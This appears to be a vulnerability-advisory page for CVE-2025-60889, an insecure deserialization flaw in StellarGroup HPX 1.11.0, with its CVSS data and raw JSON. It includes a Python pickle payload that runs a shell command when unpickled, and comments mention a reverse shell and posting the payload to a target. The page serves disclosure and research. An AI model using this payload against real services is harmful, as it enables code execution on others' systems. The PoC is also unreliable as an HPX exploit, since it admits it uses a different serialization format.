Security Vulnerability Report
CVE-2025-60889 CVSS 9.8 CRITICAL

CVE-2025-60889

Published: 2026-04-28 16:16:06
Last Modified: 2026-05-18 18:23:33

Description

Insecure deserialization of untrusted input in StellarGroup HPX 1.11.0 under certain conditions may allow attackers to execute arbitrary code or other unspecified impacts.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:stellar-group:hpx:*:*:*:*:*:*:*:* - VULNERABLE
StellarGroup HPX 1.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual PoC for the insecure deserialization issue (CWE-502).
# The actual payload depends on the serialization format used by HPX (e.g., Cereal, Boost);
# Python's pickle is used here only to illustrate the vulnerability class.
import pickle
import os


class MaliciousPayload:
    def __reduce__(self):
        # pickle calls __reduce__ when loading and invokes the returned callable,
        # so unpickling this object runs 'whoami' (Proof of Concept).
        # In a real attack, this would be a reverse shell or malicious command.
        return (os.system, ('whoami',))


# Serialize the malicious object
malicious_data = pickle.dumps(MaliciousPayload())
print(f"Generated Malicious Payload: {malicious_data}")

# In a real scenario, send this payload to the vulnerable HPX endpoint.
# Example: requests.post('http://target:port/vulnerable_endpoint', data=malicious_data)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60889", "sourceIdentifier": "[email protected]", "published": "2026-04-28T16:16:05.763", "lastModified": "2026-05-18T18:23:32.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insecure deserialization of untrusted input in StellarGroup HPX 1.11.0 under certain conditions may allow attackers to execute arbitrary code or other unspecified impacts."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:stellar-group:hpx:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.11.0", "matchCriteriaId": "14B3F575-203C-42B4-8615-4DA5AB61306A"}]}]}], "references": [{"url": "http://hpx.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "http://stellargroup.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://gist.github.com/TrebledJ/b32fd5c469583493ab50244045c9a6e4", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gist.github.com/TrebledJ/b32fd5c469583493ab50244045c9a6e4", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}